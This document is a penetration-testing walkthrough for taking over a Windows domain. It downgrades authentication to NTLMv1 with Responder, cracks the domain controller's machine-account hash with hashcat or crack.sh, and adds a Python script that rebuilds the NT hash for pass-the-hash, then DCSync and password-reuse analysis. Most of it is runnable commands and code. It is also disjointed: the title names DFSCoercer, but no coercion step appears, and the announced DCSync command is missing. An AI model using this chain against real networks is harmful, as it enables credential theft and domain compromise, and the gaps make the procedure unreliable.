From DFSCoercer to DA
For the attack to succeed, four requirements must be met:
- 1. Any valid domain account credentials.
- 2. Network connectivity to the target's SMB (Server Message Block) service.
- 3. The target host must be running the Print Spooler service.
- 4. The target host must be allowed to send NTLMv1 responses (it must not be configured to send NTLMv2 responses only).
To determine whether NTLMv1 responses can be sent, I check secpol.msc at Security Settings\Local Policies\Security Options\Network security: LAN Manager authentication level (the same setting is stored as the LmCompatibilityLevel value under HKLM\SYSTEM\CurrentControlSet\Control\Lsa; levels 0 to 2 still send NTLMv1). Any of the following settings is vulnerable:
- Send LM & NTLM responses (level 0)
- Send LM & NTLM – use NTLMv2 session security if negotiated (level 1)
- Send NTLM responses only (level 2)
First, ensure that Responder's challenge is set to 1122334455667788 in Responder.conf (the Challenge = line; this fixed value is the one the crack.sh rainbow tables are built for), then start Responder:
sudo python3 /usr/share/responder/Responder.py -I eth0 -w --disable-ess --lm
Note the --disable-ess and --lm flags.
They are needed because without them the captured hash is NTLMv1 with ESS (Extended Session Security), in which the client mixes its own nonce into the server challenge: the DES blocks are then computed over MD5(server challenge || client nonce) instead of over 1122334455667788, so the rainbow-table shortcut no longer applies. Responder's ESS downgrade and LanMan downgrade flags are used to obtain an NTLMv1 hash without ESS. If ESS is negotiated anyway it is easy to spot: the LM response field is an 8-byte client nonce followed by 16 zero bytes, and the DES blocks then have to be brute-forced with hashcat against the derived challenge (ntlmv1-multi derives it for you, which is where the SRV Challenge line in its output comes from).
Before starting, crackmapexec's spooler module can be used to check whether the Print Spooler service is running on the target (a null session is tried here; pass the domain credentials from requirement 1 to -u/-p if null sessions are refused):
crackmapexec smb -u "" -p "" target_ip -M spooler
Once the DC's NTLMv1 hash has been captured, it can be cracked back into the plain NTLM hash of the DC machine account, which is directly usable for pass-the-hash. This can be done quickly by submitting NTHASH:<NT response> to crack.sh, which uses DES rainbow tables built for the 1122334455667788 challenge, or by reconstructing the NTLM hash from its DES components with hashcat and EvilMog's ntlmv1-multi tool (my hashcat rig with an NVIDIA 3090 takes around 16 days to brute-force the needed DES keys).
python3 ntlmv1.py --ntlmv1 "hashcat::DUSTIN-5AA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788"
['hashcat', '', 'DUSTIN-5AA37877', '85D5BC2CE95161CD00000000000000000000000000000000', '892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0', '1122334455667788']
LM Response: 85D5BC2CE95161CD00000000000000000000000000000000
NT Response: 892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0
Client Challenge: 1122334455667788
SRV Challenge: b36d2b9a8607ea77
To calculate the final 4 hex characters (the last 2 bytes) of the NTLM hash, use:
./ct3_to_ntlm.bin 2BBD6C9ABCD021D0 1122334455667788 85D5BC2CE95161CD00000000000000000000000000000000
To crack with hashcat, create a file with the following contents (the first and second DES block of the NT response, each paired with the effective challenge):
892F905962F76D32:b36d2b9a8607ea77
3837F613F88DE27C:b36d2b9a8607ea77
To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
To crack with crack.sh, use the NTHASH:<NT response> token described above.
The steps I followed with hashcat on Windows were:
- 1. Use the DES_full.charset charset shipped with hashcat (charsets\DES_full.charset).
- 2. Create the 14000.hash file with the two DES blocks printed by the tool:
892F905962F76D32:b36d2b9a8607ea77
3837F613F88DE27C:b36d2b9a8607ea77
- 3. Execute hashcat. Mode 14000 is plain DES with the challenge as the plaintext; DES ignores the low bit of each key byte, so the effective search space is 2^56. Each cracked line yields one 8-byte DES key, i.e. 7 bytes of the NTLM hash plus a parity bit per byte: the two keys are bytes 0-6 and 7-13 of the NTLM hash, and ct3_to_ntlm.bin supplies bytes 14-15.
.\hashcat.exe -m 14000 -a 3 -1 .\charsets\DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1
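As an added example (not code from the original post and not part of ntlmv1-multi), the following Python script reproduces the reasoning behind the ntlmv1.py output above using only the standard library: it splits the NetNTLMv1 line into its three DES ciphertext blocks, derives the effective challenge when Extended Session Security was negotiated (the LM field of the sample is an 8-byte nonce followed by 16 zero bytes, which is how b36d2b9a8607ea77 is obtained from 1122334455667788), emits the two hashcat -m 14000 lines and the ct3_to_ntlm.bin arguments, and finally reassembles the NT hash from the two 8-byte DES keys hashcat returns plus the two bytes from ct3_to_ntlm.bin. The sample line is the one from the tool output above; the DES cracking itself is left to hashcat and ct3_to_ntlm.bin.

```python
import hashlib

# Constructed sample: the NetNTLMv1 line from the ntlmv1.py run above.
# Fields: user::domain:LM response:NT response:server challenge
SAMPLE = ("hashcat::DUSTIN-5AA37877:"
          "85D5BC2CE95161CD00000000000000000000000000000000:"
          "892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:"
          "1122334455667788")


def parse_netntlmv1(line):
    """Split a Responder NetNTLMv1 line into its fields and sanity-check the lengths."""
    user, _, domain, lm_resp, nt_resp, challenge = line.strip().split(":")
    if len(lm_resp) != 48 or len(nt_resp) != 48 or len(challenge) != 16:
        raise ValueError("not a NetNTLMv1 line (expected 24-byte responses, 8-byte challenge)")
    return {"user": user, "domain": domain, "lm": lm_resp.upper(),
            "nt": nt_resp.upper(), "challenge": challenge.lower()}


def effective_challenge(challenge, lm_resp):
    """Return (challenge the DES blocks were computed over, ess_negotiated).

    With Extended Session Security the LM field is an 8-byte client nonce followed by
    16 zero bytes and the NT response is computed over MD5(server challenge || client
    nonce)[:8] (MS-NLMP 3.3.1). Without ESS the server challenge is used directly.
    """
    if lm_resp[16:] == "0" * 32:
        mixed = hashlib.md5(bytes.fromhex(challenge + lm_resp[:16])).hexdigest()
        return mixed[:16], True
    return challenge.lower(), False


def split_nt_response(nt_resp):
    """NT response = DES_K1(C) || DES_K2(C) || DES_K3(C), where K1 and K2 are the first
    14 bytes of the NT hash and K3 is its last 2 bytes padded with five zero bytes."""
    return nt_resp[0:16], nt_resp[16:32], nt_resp[32:48]


def hashcat_14000_lines(line):
    """Input lines for hashcat -m 14000 (plain DES, PT=$salt): ciphertext:challenge for K1 and K2."""
    f = parse_netntlmv1(line)
    chal, _ = effective_challenge(f["challenge"], f["lm"])
    ct1, ct2, _ = split_nt_response(f["nt"])
    return [f"{ct1}:{chal}", f"{ct2}:{chal}"]


def ct3_to_ntlm_args(line):
    """Arguments in the order ntlmv1.py prints them for ct3_to_ntlm.bin: ct3, server challenge, LM response."""
    f = parse_netntlmv1(line)
    _, _, ct3 = split_nt_response(f["nt"])
    return [ct3, f["challenge"], f["lm"]]


def expand_des_key(key7):
    """Spread 7 key bytes over 8 bytes with an odd-parity bit in each low bit (what NTLMv1 does before DES)."""
    bits = int.from_bytes(key7, "big")
    out = bytearray()
    for i in range(8):
        chunk = (bits >> (49 - 7 * i)) & 0x7F   # next 7 bits, MSB first
        b = chunk << 1
        if bin(b).count("1") % 2 == 0:          # odd parity in the low bit
            b |= 1
        out.append(b)
    return bytes(out)


def strip_des_parity(key8):
    """Inverse of expand_des_key: drop the low (parity) bit of each of the 8 bytes.
    hashcat -m 14000 reports a DES key as 8 bytes, so this recovers the 7 NT-hash bytes it encodes."""
    if len(key8) != 8:
        raise ValueError("DES key must be 8 bytes")
    bits = 0
    for b in key8:
        bits = (bits << 7) | (b >> 1)
    return bits.to_bytes(7, "big")


def assemble_nt_hash(k1, k2, last2):
    """Rebuild the 16-byte NT hash from the two DES keys hashcat cracked (8 bytes each)
    and the 2 bytes found by ct3_to_ntlm.bin; the result is usable for pass-the-hash."""
    if len(last2) != 2:
        raise ValueError("ct3_to_ntlm yields exactly 2 bytes")
    return (strip_des_parity(k1) + strip_des_parity(k2) + last2).hex()


if __name__ == "__main__":
    for hc_line in hashcat_14000_lines(SAMPLE):
        print(hc_line)
    print("./ct3_to_ntlm.bin", *ct3_to_ntlm_args(SAMPLE))
```

Run it with no arguments to print the hashcat input lines and the ct3_to_ntlm.bin invocation for the sample; strip_des_parity is the piece that turns an 8-byte DES key reported by hashcat back into the 7 bytes of the NTLM hash it encodes.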
With the cracked NTLM hash in hand, the next step is to find the target user. The domain users can be dumped beforehand with ldapdomaindump or BloodHound. Once a domain admin account has been picked, we just need to run the following command (DCSync attack):
The NTLM hash of the domain admin account is thereby obtained.
python3 script_passwords.py hashes.txt cracked.txt
script_passwords.py takes the dumped hashes (hashes.txt, assumed here to hold one account per line in secretsdump format, i.e. user:rid:lmhash:nthash:::) and the hashcat results (cracked.txt, one nthash:password per line) and writes the matching cracked line once for every account that uses that hash:
import sys

file_hashes = sys.argv[1]
file_cracked = sys.argv[2]
with open(file_hashes) as f:
    hashes = [line.rstrip() for line in f]
with open(file_cracked) as f:
    cracked = [line.rstrip() for line in f]
with open("output.txt", "w") as out:
    for account in hashes:
        for crack in cracked:
            # hashcat prints "nthash:password"; match on the hash part only
            nthash = crack.split(":")[0]
            if nthash and nthash in account:
                out.write(crack + "\n")
The output.txt file now contains one line per matched account, so a reused password appears as many times as there are accounts sharing it.
Finally, the most common passwords can be listed:
cat output.txt | sort | uniq -c | sort -nr